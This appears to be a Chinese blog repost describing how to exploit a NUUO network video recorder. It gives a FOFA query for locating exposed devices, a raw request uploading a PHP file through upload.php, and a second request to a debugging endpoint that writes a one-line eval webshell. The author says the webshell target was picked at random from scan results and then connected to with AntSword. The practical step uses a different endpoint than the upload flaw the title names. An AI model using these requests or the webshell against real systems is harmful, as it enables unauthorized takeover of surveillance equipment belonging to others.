NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

admin 2024年10月28日19:23:00评论25 views字数 1370阅读4分34秒阅读模式

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

产品简介

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

NUUO网络视频录像机(Network Video Recorder,简称NVR)是NUUO Inc.生产的一种专业视频监控设备,它广泛应用于零售、交通教育、政府和银行等多个领域。能够同时管理多个!P摄像头,实现视频录制、存储、回放及远程监控等功能。,它采用先进的视频处理技术,提供高清、流畅的视频画面,满足各种复杂环境下的监控需求。

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

漏洞概述

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

NUUO网络视频录像机 upload.php 存在任意文件上传漏洞,未经身份验证远程攻击者可利用该漏洞代码执行,写入WebShel,进一步控制服务器权限。

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

FOFA

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

title="Network Video Recorder Login"

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

漏洞复现

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

POST /upload.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36Connection: keep-aliveContent-Type: multipart/form-data; boundary=--------ok4o88lom----------ok4o88lomContent-Disposition: form-data; name="userfile"; filename="test.php"<?php phpinfo();@unlink(__FILE__);?>----------ok4o88lom--

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

验证

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

如果没有真实的环境和深入的手法,我估计你们也很难理解,来吧,小龙带你们整

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

实战复现

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

1、首先利用Hw100进行漏洞检

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

检测出来之后去到bp然后随机挑选一位幸运嘉宾

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

可以看到命令成功回显,那么我们可以尝试写入一句话木马来getshell

GET /__debugging_center_utils___.php?log=;echo+'<%3fphp+%40eval($_POST[cmd])%3b%3f>'>a123.php HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/xml

发送完数据包之后就可以尝试蚁剑连接

目标url

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

免责声明

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

我们红岸基地网安教学,只有两个老师、一个是赵小龙老师、一个是陈师傅。可以联系微信:Changethe_one,只要你提供目前的现状与学历,陈老师可以免费帮大家做职业规划。

Changethe_one

大家对于网络安全感兴趣的话,不妨来加一下我们的陈老师,我们会定期在给大家分享渗透工具实战,还会有渗透公开课可以试听!

扫码添加,提升自己!

👇👇👇

NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

原文始发于微信公众号(暗影网安实验室):NUUO网络视频录像机 upload.php 任意文件上传漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月28日19:23:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   NUUO网络视频录像机 upload.php 任意文件上传漏洞复现https://cn-sec.com/archives/3325926.html

发表评论

匿名网友 填写信息